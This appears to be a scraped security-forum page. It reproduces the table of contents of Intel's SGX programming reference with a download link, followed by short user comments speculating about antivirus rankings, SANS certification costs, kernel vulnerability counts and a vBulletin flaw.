. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-4 3.3 Calling Enclave Procedures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-4 3.3.1 Calling Convention . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
3-4 3.3.2 Register Preservation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-4 3.3.3 Returning to Caller. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-5 3.4 SGX Key and Attestation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-5 3.5 EPC and Management of EPC Pages. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-6 3.5.1 EPC Implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-6 3.5.2 OS Management of EPC Pages. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-6 3.5.3 Eviction of Enclave Pages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-7 3.5.4 Loading an Enclave Page . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-7 3.5.5 Eviction of an SECS Page . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-8 3.5.6 Eviction of a Version Array Page . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-8 3.6 Changes to Instruction Behavior Inside an Enclave. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-8 3.6.1 Illegal Instructions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-8 3.6.2 RDRAND and RDSEED Instructions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-9 3.6.3 PAUSE Instruction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-9 3.6.4 INT 3 Behavior Inside an Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-9 3.6.5 INVD Handling when Enclaves Are Enabled . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-9 CHAPTER 4 ENCLAVE EXITING EVENTS 4.1 Compatible Switch to the Exiting Stack of AEX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-1 4.2 State Saving by AEX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-2 4.3 Synthetic State on Asynchronous Enclave Exit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
4-3 4.3.1 Processor Synthetic State on Asynchronous Enclave Exit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-3 4.3.2 Synthetic State for Extended Features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-4 4.3.3 VMCS Synthetic State on Asynchronous Enclave Exit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-4 4.4 AEX Flow. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-5 4.4.1 AEX Operational Detail . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4-5 CHAPTER 5 INSTRUCTION REFERENCES 5.1 SGX InstructIon Syntax and Operation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-1 5.1.1 ENCLS Register Usage Summary. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-1 5.1.2 ENCLU Register Usage Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-2 5.1.3 Information and Error Codes. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-2 5.1.4 Internal CREGs. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-3 5.1.5 Concurrent Operation Restrictions. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-3 5.1.5.1 Concurrency Restrictions. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-4 5.2 SGX InstructIon Reference . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-5 ENCLS—Execute an Enclave System Function of Specified Leaf Number . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-6 ENCLU—Execute an Enclave User Function of Specified Leaf Number. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-8 5.3 SGX System Leaf Function Reference. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-11 EADD—Add a Page to an Uninitialized Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-12 EBLOCK—Mark a page in EPC as Blocked . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-16 ECREATE—Create an SECS page in the Enclave Page Cache . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-19 EDBGRD—Read From a Debug Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-23 EDBGWR—Write to a Debug Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . 
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-26 EEXTEND—Extend Uninitialized Enclave Measurement by 256 Bytes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-29 EINIT—Initialize an Enclave for Execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-32 ELDB/ELDU—Load an EPC page and Marked its State . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-38 EPA—Add Version Array . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-42 EREMOVE—Remove a page from the EPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-44 ETRACK—Activates EBLOCK Checks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-47 EWB—Invalidate an EPC Page and Write out to Main Memory. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-49 5.4 SGX User Leaf Function Reference . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-53 Ref. #329298-001 v 5.4.1 Instruction Column in the Instruction Summary Table . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-53 EENTER—Enters an Enclave. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-54 EEXIT—Exits an Enclave . . . . . . . . . 
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-61 EGETKEY—Retrieves a Cryptographic Key . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-64 EREPORT—Create a Cryptographic Report of the Enclave. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-71 ERESUME—Re-Enters an Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5-75 CHAPTER 6 SGX INTERACTIONS WITH IA32 AND INTEL 64 ARCHITECTURE 6.1 SGX Availability in Various Processor Modes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-1 6.2 IA32_FEATURE_CONTROL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-1 6.3 Interactions with Segmentation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-1 6.3.1 Scope of Interaction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-1 6.3.2 Interactions of SGX Instructions with Instruction Prefixes and Addressing. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-1 6.3.3 Interaction of SGX Instructions with Segmentation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
.6-2 6.3.4 Interactions of Enclave Execution with Segmentation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-2 6.4 Interactions with Paging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-2 6.5 Interactions with VMX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-2 6.5.1 Availability of SGX under VMX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-3 6.5.2 Setting of CR4.SEE Bit under VMX Operation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-3 6.5.3 VMM Controls on Exposing SGX to the Guest. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-3 6.5.4 VMX Capability Enumeration MSRs and SGX. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-4 6.5.4.1 Guest State Area - Guest Non-Register State . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-4 6.5.4.2 VM-Execution Controls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-4 6.5.4.3 Basic Exit Reasons . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
.6-5 6.5.5 VM Exits While Inside an Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-5 6.5.6 VM Entry Consistency Checks and SGX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-5 6.5.7 VM Execution Control Setting Checks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-6 6.5.8 Guest Interruptibility State Checks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-6 6.5.9 Interaction of SGX with Various VMMs. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-6 6.5.10 Interactions with EPTs. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-6 6.5.11 Interactions with APIC Virtualization. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-6 6.5.12 Interactions with Monitor Trap Flag . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-6 6.6 SGX Interactions with Architecturally-visible Events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-7 6.7 Interactions with the XSAVE/XRSTOR Processor Extended States . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
6-7 6.7.1 Requirements and Architecture Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-7 6.7.2 Relevant Fields in Various Data Structures. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-8 6.7.2.1 SECS.ATTRIBUTES.XFRM. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-8 6.7.2.2 SECS.SSAFRAMESIZE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-8 6.7.2.3 XSAVE Area in SSA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-9 6.7.3 Processor Extended States and ENCLS[ECREATE] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-9 6.7.4 Processor Extended States and ENCLU[EENTER] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-9 6.7.4.1 Fault Checking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-9 6.7.4.2 State Loading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-9 6.7.5 Processor Extended States and AEX. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
. . . . .6-9 6.7.5.1 State Saving . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6-9 6.7.5.2 State Synthesis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-10 6.7.6 Processor Extended States and ENCLU[ERESUME] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-10 6.7.6.1 Fault Checking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-10 6.7.6.2 State Loading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-10 6.7.7 Processor Extended States and ENCLU[EEXIT] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-10 6.8 Interactions with SMM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-10 6.8.1 Availability of SGX instructions in SMM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-10 6.8.2 SMI while Inside an Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-11 6.8.3 SMRAM Synthetic State of AEX Triggered by SMI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
. . . . . . . . . . . . . . . . . . 6-11 6.9 Interactions of INIT, SIPI, and Wait-for-SIPI with SGX. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-11 6.10 Interactions with DMA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-12 6.11 Interactions with Memory Configuration and Various Memory Ranges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-12 6.11.1 Memory Type Considerations for PRMRR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-12 6.11.2 Interactions of PRMRR with Various Memory Regions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-12 vi Ref. #329298-001 6.11.2.1 Interactions of PRMRR with SMRR. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-12 6.11.2.2 Interactions of PRMRR with MTRRs. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-12 6.11.2.3 Interactions of PRMRR with MMIO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-13 6.11.2.4 Interactions of PRMRR with IA32_APIC_BASE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-13 6.11.3 Interactions of PRMRR with Virtual APIC Page. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
6-13 6.11.3.1 Interactions of PRMRR with Physical Memory Accesses. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-13 6.11.4 Interactions of SGX with APIC Access Address . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-14 6.12 Interactions with TXT. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-14 6.12.1 Enclaves Created Prior to Execution of GETSEC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-14 6.12.2 Interaction of GETSEC with SGX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-14 6.13 Interactions with Caching of Linear-address Translations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-14 6.14 Interactions with Intel® Transactional Synchronization Extensions (Intel® TSX) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-15 6.14.1 HLE and RTM Debug . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-15 6.15 SGX Interactions with S states . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-15 6.16 SGX Interactions with Machine Check Architecture (MCA) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6-15 6.16.1 Interactions with MCA Events . . . . . . . . . . . . . . . . . . . . 
6.16.2 Machine Check Enables (IA32_MCi_CTL)
6.16.3 CR4.MCE
CHAPTER 7 ENCLAVE CODE DEBUG AND PROFILING
7.1 Configuration and Controls
7.1.1 Debug Enclave vs. Production Enclave
7.1.2 Tool-chain Opt-in
7.2 Single Step Debug
7.2.1 Single Stepping Requirements
7.2.2 Single Stepping ENCLS Instruction Leafs
7.2.3 Single Stepping ENCLU Instruction Leafs
7.2.4 Single-stepping Enclave Entry with Opt-out Entry
7.2.4.1 Single Stepping without AEX
7.2.4.2 Single Step Preempted by AEX due to Non-SMI Event
7.2.5 RFLAGS.TF Treatment on AEX
7.2.6 Restriction on Setting of TF after an Opt-out Entry
7.2.7 Trampoline Code Considerations
7.3 Code and Data Breakpoints
7.3.1 Breakpoint Suppression
7.3.2 Breakpoint Match Reporting during Enclave Execution
7.3.3 Reporting of Code Breakpoint on Next Instruction on a Debug Trap
7.3.4 RFLAGS.RF Treatment on AEX
7.3.5 Breakpoint Matching in SGX Instruction Flows
7.4 INT3 Consideration
7.4.1 Behavior of INT3 inside an Enclave
7.4.2 Debugger Considerations
7.4.3 VMM Considerations
7.5 Branch Tracing
7.5.1 BTF Treatment
7.5.2 LBR Treatment
7.5.2.1 LBR Stack on Opt-in Entry
7.5.2.2 LBR Stack on Opt-out Entry
7.5.2.3 Mispredict Bit, Record Type, and Filtering
7.6 Interaction with Performance Monitoring
7.6.1 IA32_PERF_GLOBAL_STATUS Enhancement
7.6.2 Performance Monitoring with Opt-in Entry
7.6.3 Performance Monitoring with Opt-out Entry
7.6.4 Enclave Exit and Performance Monitoring
7.6.5 PEBS Record Generation on SGX Instructions
7.6.6 Exception-Handling on PEBS/BTS Loads/Stores after AEX
7.6.6.1 Other Interactions with Performance Monitoring
Download: https://software.intel.com/sites/default/files/329298-001.pdf
  21. It may well be so: the virus doesn't necessarily have to be extremely sophisticated, but: 1. Bitdefender will detect it 2. The others won't detect it Result: first place in AV-Test. As for "the thief cries 'stop, thief'", there's something bigger going on: NSA aka USA vs Kaspersky aka Russia.
  22. It's not marketing, it's an "attack" aimed at the USA.
  23. Oh, the dear folks at SANS... And their $5000 certifications
  24. Wow. Go figure: the Linux kernel has more problems than the Windows kernel. (Most of the problems are shared across different versions: 7, 8, 8.1...) What's that supposed to mean? Could it upset the notion that "But oh, Linux is more secure than Windows"?
  25. Yes, it seems vBulletin isn't the only script with this kind of problem. Has anyone tested it?